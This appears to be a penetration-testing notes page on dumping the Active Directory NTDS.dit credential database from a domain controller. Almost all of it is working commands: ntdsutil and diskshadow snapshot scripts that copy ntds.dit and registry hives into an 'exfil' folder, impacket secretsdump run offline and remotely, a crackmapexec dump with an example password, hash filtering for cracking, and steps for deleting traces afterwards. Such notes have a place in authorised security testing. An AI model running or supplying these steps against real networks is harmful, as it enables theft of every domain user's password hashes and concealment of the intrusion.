Dumping NTDS

Grab the NTDS File

  • Get the NTDS file using ntdsutil.exe → https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration

  • Find the secretsdump.py script from impacket. (will be at /usr/share/doc/python3-impacket/examples/ )

python secretsdump.py -ntds ntds.dit -system SYSTEM -outputfile clientntds -hashes LMHASH:NTHASH -user-status LOCAL

  • Clean up the hashes using grep and cut, or whatever you want, such that the output only shows the domain users that are enabled. Something along the lines of

cat clientntds | grep Enabled | grep acme.com | cut -d " " -f1 > ntds.txt

  • Move to cracker

  • Make sure you clean up everything (delete shadow file, and ntds and system)

No Credentials - ntdsutil

If you have no credentials, but you have access to the DC, it's possible to dump the ntds.dit using a lolbin ntdsutil.exe:

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

We can see that the ntds.dit and SYSTEM as well as SECURITY registry hives are being dumped to c:\temp:

We can then dump password hashes offline with impacket:

root@~/tools/mitre/ntds# /usr/bin/impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local

No Credentials - diskshadow

On Windows Server 2008+, we can use diskshadow to grab the ntdis.dit.

Create a shadowdisk.exe script instructing to create a new shadow disk copy of the disk C (where ntds.dit is located in our case) and expose it as drive Z:\

shadow.txt

set context persistent nowriters
set metadata c:\exfil\metadata.cab
add volume c: alias trophy
create
expose %someAlias% z:

...and now execute the following:

mkdir c:\exfil
diskshadow.exe /s C:\users\Administrator\Desktop\shadow.txt
cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit

Below shows the ntds.dit got etracted and placed into our c:\exfil folder:

Inside interactive diskshadow utility, clean up the shadow volume:

diskshadow.exe
    > delete shadows volume trophy
    > reset

With Credentials

If you have credentials for an account that can log on to the DC, it's possible to dump hashes from NTDS.dit remotely via RPC protocol with impacket:

impacket-secretsdump -just-dc-ntlm offense/[email protected]

Using CME

crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' --ntds drsuapi
PreviousAS-REP RoastingNextEncoder

Last updated